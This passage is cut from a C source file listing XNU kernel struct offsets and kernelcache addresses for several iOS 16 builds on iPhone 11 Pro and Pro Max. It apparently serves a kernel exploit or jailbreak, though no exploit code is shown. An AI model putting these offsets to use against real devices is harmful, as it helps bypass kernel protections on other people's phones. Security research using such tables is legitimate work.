0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a365178, .kernelcache__gPhysBase = 0xfffffff00786fc80, .kernelcache__gPhysSize = 0xfffffff00786fc80 + 0x8, .kernelcache__gVirtBase = 0xfffffff00786de60, .kernelcache__perfmon_devices = 0xfffffff00a3a0370, .kernelcache__perfmon_dev_open = 0xfffffff007ed8be8, .kernelcache__ptov_table = 0xfffffff0078232a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39f800, .kernelcache__vm_pages = 0xfffffff0078200c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007822250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39f7f8, .kernelcache__vn_kqfilter = 0xfffffff007f2af14, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E247", .device_id = "iPhone12,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a42d208, .kernelcache__gPhysBase = 0xfffffff00794fed0, .kernelcache__gPhysSize = 0xfffffff00794fed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794e0a8, .kernelcache__perfmon_devices = 0xfffffff00a46b4f0, .kernelcache__perfmon_dev_open = 0xfffffff007efb3c8, .kernelcache__ptov_table = 0xfffffff007903178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a46a990, .kernelcache__vm_pages = 0xfffffff0078ffeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a46a988, .kernelcache__vn_kqfilter = 0xfffffff007f49f7c, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E252", .device_id = "iPhone12,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a42d208, .kernelcache__gPhysBase = 0xfffffff00794fed0, .kernelcache__gPhysSize = 0xfffffff00794fed0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794e0a8, .kernelcache__perfmon_devices = 0xfffffff00a46b4f0, .kernelcache__perfmon_dev_open = 0xfffffff007efb3c8, .kernelcache__ptov_table = 0xfffffff007903178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a46a990, .kernelcache__vm_pages = 0xfffffff0078ffeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a46a988, .kernelcache__vn_kqfilter = 0xfffffff007f49f7c, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:28 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8030", .build_version = "20F66", .device_id = "iPhone12,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a435288, .kernelcache__gPhysBase = 0xfffffff007950010, .kernelcache__gPhysSize = 0xfffffff007950010 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794e1e8, .kernelcache__perfmon_devices = 0xfffffff00a4734f0, .kernelcache__perfmon_dev_open = 0xfffffff007efb5d0, .kernelcache__ptov_table = 0xfffffff007903178, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a472990, .kernelcache__vm_pages = 0xfffffff0078ffeb0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902118, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a472988, .kernelcache__vn_kqfilter = 0xfffffff007f4a41c, }, //iOS 16.6 beta 1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:02 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8030", .build_version = "20G5026e", .device_id = "iPhone12,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4c9ab0, .kernelcache__gPhysBase = 0xfffffff0079641b8, .kernelcache__gPhysSize = 0xfffffff0079641b8 + 0x8, .kernelcache__gVirtBase = 0xfffffff007962370, .kernelcache__perfmon_devices = 0xfffffff00a509520, .kernelcache__perfmon_dev_open = 0xfffffff007f1bd78, .kernelcache__ptov_table = 0xfffffff0079179b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a508910, .kernelcache__vm_pages = 0xfffffff007914100, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007916958, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a508908, .kernelcache__vn_kqfilter = 0xfffffff007f6a588, }, // End iPhone 11 Pro // // Start iPhone 11 Pro Max // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:54 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8030", .build_version = "20C65", .device_id = "iPhone12,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a35d178, .kernelcache__gPhysBase = 0xfffffff00786fb98, .kernelcache__gPhysSize = 0xfffffff00786fb98 + 0x8, .kernelcache__gVirtBase = 0xfffffff00786dd78, .kernelcache__perfmon_devices = 0xfffffff00a398370, .kernelcache__perfmon_dev_open = 0xfffffff007ed4bd8, .kernelcache__ptov_table = 0xfffffff007823260, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a397800, .kernelcache__vm_pages = 0xfffffff007820088, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007822210, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3977f8, .kernelcache__vn_kqfilter = 0xfffffff007f26f14, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D47", .device_id = "iPhone12,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a365178, .kernelcache__gPhysBase = 0xfffffff00786fc80, .kernelcache__gPhysSize = 0xfffffff00786fc80 + 0x8, .kernelcache__gVirtBase = 0xfffffff00786de60, .kernelcache__perfmon_devices = 0xfffffff00a3a0370, .kernelcache__perfmon_dev_open = 0xfffffff007ed8be8, .kernelcache__ptov_table = 0xfffffff0078232a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39f800, .kernelcache__vm_pages = 0xfffffff0078200c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007822250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39f7f8, .kernelcache__vn_kqfilter = 0xfffffff007f2af14, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:00 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8030", .build_version = "20D67", .device_id = "iPhone12,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a365178, .kernelcache__gPhysBase = 0xfffffff00786fc80, .kernelcache__gPhysSize = 0xfffffff00786fc80 + 0x8, .kernelcache__gVirtBase = 0xfffffff00786de60, .kernelcache__perfmon_devices = 0xfffffff00a3a0370, .kernelcache__perfmon_dev_open = 0xfffffff007ed8be8, .kernelcache__ptov_table = 0xfffffff0078232a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a39f800, .kernelcache__vm_pages = 0xfffffff0078200c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007822250, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a39f7f8, .kernelcache__vn_kqfilter = 0xfffffff007f2af14, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:25 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8030", .build_version = "20E247", .device_id = "iPhone12,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a42d208, .kernelcache__gPhysBase = 0xfffffff00794fed0, 